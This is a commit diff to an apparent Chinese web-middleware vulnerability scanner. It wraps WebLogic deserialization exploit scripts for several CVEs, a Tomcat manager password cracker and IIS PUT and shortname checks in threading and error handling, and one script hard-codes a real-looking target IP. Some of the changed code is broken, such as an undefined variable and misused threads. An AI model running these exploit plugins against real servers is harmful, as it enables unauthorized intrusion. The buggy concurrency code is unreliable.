1

N-MiddlewareScan.py

@@ -4,18 +4,20 @@
 #blog:http://www.youknowi.xin
 import sys
 import os
+import re
 import argparse
 import traceback
 import config
+import multiprocessing
 from concurrent.futures import ThreadPoolExecutor
 from plugins import plugins
 #80,4848,7001,7002,8000,8001,8080,8081,8888,9999,9043,9080
 class MiddlewareScan(object):
-    def __init__(self,arg,ThreadNum):
+    def __init__(self,arg,config):
         self.arg=arg
-        self.ThreadNum=ThreadNum
+        self.config=config
     def run(self):
-        P = plugins.plugins(self.arg,self.ThreadNum)
+        P = plugins.plugins(self.arg,self.config)
         P.run()
 def main():
     arg = argparse.ArgumentParser(description='MiddlewareScan By Naivete')
@@ -24,31 +26,44 @@ def main():
     arg.add_argument('-p', '--options', help='options', dest='options')
     arg.add_argument('-t', '--thread', help='thread num', dest='thread')
     arg = arg.parse_args()
+    if len(sys.argv)<=2:
+        os.system("python "+sys.argv[0]+" -h")
+        exit()
+    print("开始检测中间件相关漏洞:")
     if arg.thread:
         config.ThreadNum=arg.thread
     if not arg.options:
         arg.options="all"
     if arg.url:
+        if not re.match(r'^https?:/{2}\w.+$', url):
+            print("输入标准的url，如:http://www.baidu.com")
+            exit()
         try:
             S=MiddlewareScan(arg,config)
             S.run()
         except Exception:
             print(traceback.print_exc())
     if arg.file:
-        try:
+        multiprocessing_list=[]
-            with open(arg.file,encoding="utf-8") as f:
+        f = open(arg.file, encoding="utf-8")
-                with ThreadPoolExecutor(config.ThreadNum) as excetor:
         for url in f.readlines():
-                        try:
             url = url.rstrip("\n")
+            arg.url = url
+            if not re.match(r'^https?:/{2}\w.+$', url):
+                if not url.startswith("http"):
+                    arg.url="http://"+url
             S = MiddlewareScan(arg, config)
-                            excetor.submit(S.run())
+            multiprocessing_list.append(S.run())
-                        except Exception:
-                            pass
         f.close()
+        pool=multiprocessing.Pool(config.Process)
+        try:
+            #pool.apply_async(multiprocessing_list)
+            for i in multiprocessing_list:
+                pool.apply_async(i)
+            pool.close()
+            pool.join()
         except Exception:
             print(traceback.print_exc())
     print("\n\n相关漏洞检测完成。")
 if __name__ == '__main__':
-    print("开始检测中间件相关漏洞:")
     main()

config.py

@@ -1,4 +1,5 @@
 ThreadNum=50
+Process=30
 Timeout=6
 port=80
 #linux

plugins/IIS_special_plugin_.py

@@ -38,5 +38,8 @@ def IIS_shortname_Scanner(url):
     except Exception as e:
         raise Exception('[is_vul.Exception] %s' % str(e))
 def IIS_special_plugin_(arg,config):
+    try:
         IIS_PUT(arg,config)
         IIS_shortname_Scanner(arg.url)
+    except Exception:
+        pass

plugins/special_plugin_.py

@@ -22,7 +22,7 @@ def special_plugin_(arg,config):
         try:
             thread.start()
         except Exception as e:
-            print(e)
+            pass
     for t in threads:
         t.join()
 

plugins/tomcat_special_plugin_.py

@@ -6,6 +6,7 @@ import uuid
 from termcolor import cprint
 from urllib.parse import urlparse
 from concurrent.futures import ThreadPoolExecutor
+import threading
 def requests_post(url,username,password,flag_list):
     try:
         login_url = url + '/manager/html'
@@ -79,6 +80,14 @@ class Exploit:
             cprint("[-] " + __file__ + "====>连接超时", "cyan")
 
 def tomcat_special_plugin_(arg,config):
-    Exploit().attack(arg.url)
+    threads=[]
-    crack_password(arg,config)
+    threads.append(threading.Thread(Exploit().attack(arg.url)))
+    threads.append(threading.Thread(crack_password(arg,config)))
+    for thread in threads:
+        try:
+            thread.start()
+        except Exception:
+            pass
+    for j in threads:
+        j.join()
 

plugins/weblogic_poc/CVE_2016_0638.py

@@ -17,6 +17,7 @@ PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d
 VER_SIG=['weblogic.jms.common.StreamMessageImpl']
 def t3handshake(sock,server_addr):
     sock.connect(server_addr)
+    sock.settimeout(7)
     sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
     time.sleep(1)
     sock.recv(1024)
@@ -53,6 +54,7 @@ def checkVul(res,server_addr,index):
         # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index])
         print(('[-]目标weblogic未检测到{}'.format(VUL[index])))
 def run(rip,rport,index):
+    try:
         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
         ##打了补丁之后，会阻塞，所以设置超时时间，默认15s，根据情况自己调整
         sock.settimeout(10)
@@ -61,6 +63,8 @@ def run(rip,rport,index):
         buildT3RequestObject(sock, rport)
         rs = sendEvilObjData(sock, PAYLOAD[index])
         checkVul(rs, server_addr, index)
+    except Exception as e:
+        print("CVE_2016_0638脚本出错")
 
 if __name__=="__main__":
     rip = '222.85.76.240'

plugins/weblogic_poc/CVE_2016_3510.py

@@ -17,6 +17,7 @@ PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d
 VER_SIG=['org.apache.commons.collections.functors.InvokerTransformer']
 def t3handshake(sock,server_addr):
     sock.connect(server_addr)
+    sock.settimeout(7)
     sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
     time.sleep(1)
     sock.recv(1024)
@@ -53,6 +54,7 @@ def checkVul(res,server_addr,index):
         # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index])
         print(('[-]目标weblogic未检测到{}'.format(VUL[index])))
 def run(rip,rport,index):
+    try:
         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
         ##打了补丁之后，会阻塞，所以设置超时时间，默认15s，根据情况自己调整
         sock.settimeout(10)
@@ -61,6 +63,8 @@ def run(rip,rport,index):
         buildT3RequestObject(sock, rport)
         rs = sendEvilObjData(sock, PAYLOAD[index])
         checkVul(rs, server_addr, index)
+    except Exception:
+        print("CVE_2016_3510脚本出错")
 
 if __name__=="__main__":
     rip = '127.0.0.1'

plugins/weblogic_poc/CVE_2017_3248.py

@@ -17,6 +17,7 @@ PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d
 VER_SIG=['\\$Proxy[0-9]+']
 def t3handshake(sock,server_addr):
     sock.connect(server_addr)
+    sock.settimeout(7)
     sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
     time.sleep(1)
     sock.recv(1024)
@@ -53,6 +54,7 @@ def checkVul(res,server_addr,index):
         # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index])
         print(('[-]目标weblogic未检测到{}'.format(VUL[index])))
 def run(rip,rport,index):
+    try:
         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
         ##打了补丁之后，会阻塞，所以设置超时时间，默认15s，根据情况自己调整
         sock.settimeout(10)
@@ -61,6 +63,8 @@ def run(rip,rport,index):
         buildT3RequestObject(sock, rport)
         rs = sendEvilObjData(sock, PAYLOAD[index])
         checkVul(rs, server_addr, index)
+    except Exception:
+        print("CVE_2017_3246脚本出错")
 
 if __name__=="__main__":
     rip = '127.0.0.1'

plugins/weblogic_poc/CVE_2017_3506.py

@@ -64,9 +64,12 @@ def poc(url):
         result = '[-]目标weblogic未检测到CVE-2017-3506'
         return result
 def run(rip,rport):
+    try:
         url = rip + ':' + str(rport)
         result = poc(url=url)
         print(result)
+    except Exception:
+        print("CVE_2017_3506脚本出错")
 
 if __name__ == '__main__':
     run('127.0.0.1',7001)

plugins/weblogic_poc/CVE_2018_2628.py

@@ -20,6 +20,7 @@ VER_SIG=['\\$Proxy[0-9]+']
 
 def t3handshake(sock,server_addr):
     sock.connect(server_addr)
+    sock.settimeout(6)
     sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
     time.sleep(1)
     sock.recv(1024)
@@ -63,6 +64,7 @@ def checkVul(res,server_addr,index):
         print(('[-]目标weblogic未检测到{}'.format(VUL[index])))
 
 def run(dip,dport,index):
+    try:
         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
         ##打了补丁之后，会阻塞，所以设置超时时间，默认15s，根据情况自己调整
         sock.settimeout(10)
@@ -72,6 +74,8 @@ def run(dip,dport,index):
         rs = sendEvilObjData(sock, PAYLOAD[index])
         # print 'rs',rs
         checkVul(rs, server_addr, index)
+    except Exception:
+        print("CVE_2018_2628脚本出错")
 
 
 if __name__=="__main__":

plugins/weblogic_poc/CVE_2018_2893.py

@@ -21,6 +21,7 @@ VER_SIG=['StreamMessageImpl']
 
 def t3handshake(sock,server_addr):
     sock.connect(server_addr)
+    sock.settimeout(6)
     sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
     time.sleep(1)
     data = sock.recv(1024)
@@ -66,6 +67,7 @@ def checkVul(res,server_addr,index):
         print(('[-]目标weblogic未检测到{}'.format(VUL[index])))
 
 def run(dip,dport,index):
+    try:
         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
         ##打了补丁之后，会阻塞，所以设置超时时间，默认15s，根据情况自己调整
         sock.settimeout(10)
@@ -75,7 +77,8 @@ def run(dip,dport,index):
         rs = sendEvilObjData(sock, PAYLOAD[index])
         # print 'rs',rs
         checkVul(rs, server_addr, index)
-
+    except Exception:
+        print("CVE_2018_2893脚本出错")
 if __name__=="__main__":
     # dip = sys.argv[1]
     # dport = int(sys.argv[2])

plugins/weblogic_poc/managerURL200.py

@@ -19,11 +19,14 @@ def islive(ur,port):
     return r.status_code
 
 def run(url,port):
+    try:
         if islive(url, port) == 200:
             u = 'http://' + str(url) + ':' + str(port) + '/console/login/LoginForm.jsp'
             print(("[+]目标weblogic控制台地址暴露!\n[+]路径为:{}\n[+]请自行尝试弱口令爆破!".format(u)))
         else:
             print("[-]目标weblogic控制台地址未找到!")
+    except Exception:
+        print("managerURL200脚本出错")
 
 if __name__=="__main__":
     url = sys.argv[1]

plugins/weblogic_poc/uddi_ssrf.py

@@ -20,10 +20,14 @@ def islive(ur,port):
     return r.status_code
 
 def run(url,port):
+    try:
         if islive(url, port) == 200:
-        print(('[+]目标weblogic存在UDDI组件!\n[+]路径为:{}\n[+]请自行验证SSRF漏洞!'.format('http://' + str(url)+':'+str(port)+'/uddiexplorer/')))
+            print(('[+]目标weblogic存在UDDI组件!\n[+]路径为:{}\n[+]请自行验证SSRF漏洞!'.format(
+                'http://' + str(url) + ':' + str(port) + '/uddiexplorer/')))
         else:
             print("[-]目标weblogic UDDI组件默认路径不存在!")
+    except Exception:
+        print("uudi_ssrf脚本出错")
 
 if __name__=="__main__":
     url = sys.argv[1]

plugins/weblogic_special_plugin_.py

@@ -8,44 +8,62 @@ from plugins.weblogic_poc import CVE_2018_2628
 from plugins.weblogic_poc import CVE_2018_2893
 from plugins.weblogic_poc import managerURL200
 from plugins.weblogic_poc import uddi_ssrf
+import threading
 import socket
 def weblogic_special_plugin_(arg,config):
     port=7001
     ip=socket.gethostbyname(arg.url.strip("http://").strip("https://"))
+    threads=[]
+    threads.append(threading.Thread(CVE_2015_4852.run(ip,port)))
+    threads.append(threading.Thread(CVE_2016_0638.run(ip,port,0)))
+    threads.append(threading.Thread(CVE_2016_3510.run(ip,port,0)))
+    threads.append(threading.Thread(CVE_2017_3248.run(ip,port,0)))
+    threads.append(threading.Thread(CVE_2017_3506.run(ip,port)))
+    threads.append(threading.Thread(CVE_2018_2893.run(ip,port,0)))
+    threads.append(threading.Thread(CVE_2018_2628.run(ip,port,0)))
+    threads.append(threading.Thread(managerURL200.run(ip,port)))
+    threads.append(threading.Thread(uddi_ssrf.run(ip,port)))
     #print(arg.url)
+    for thread in threads:
+        thread.start()
+    for j in threads:
+        j.join()
+
+    '''
         try:
-        CVE_2015_4852.run(ip,port)
+        threads[0].strat()
     except Exception:
         print("CVE_2015_4852 脚本出错")
     try:
-        CVE_2016_0638.run(ip,port,0)
+        threads[1].start()
     except Exception:
         print("CVE_2016_0638 脚本出错")
     try:
-        CVE_2016_3510.run(ip,port,0)
+        threads[2].start()
     except Exception:
         print("CVE_2016_3510 脚本出错")
     try:
-        CVE_2017_3248.run(ip,port,0)
+        threads[3].start()
     except Exception:
         print("CVE_2017_3248 脚本出错")
     try:
-        CVE_2017_3506.run(ip,port)
+        threads[4].start()
     except Exception:
         print("CVE_2017_3506 脚本出错")
     try:
-        CVE_2018_2893.run(ip,port,0)
+        threads[5].start()
     except Exception:
         print("CVE_2018_2893 脚本出错")
     try:
-        CVE_2018_2628.run(ip,port,0)
+        threads[6].start()
     except Exception:
         print("CVE_2018_2628 脚本出错")
     try:
-        managerURL200.run(ip,port)
+        threads[7].start()
     except Exception:
         print("managerURL200 脚本出错")
     try:
-        uddi_ssrf.run(ip,port)
+        threads[8].start()
     except Exception:
         print("uddi_ssrf 脚本出错")
+    '''

test.py

@@ -0,0 +1,4 @@
+import re
+url="https://baidu.comas.as"
+if re.match(r"{2}\w.+$", url):
+    print("aaaaaaa")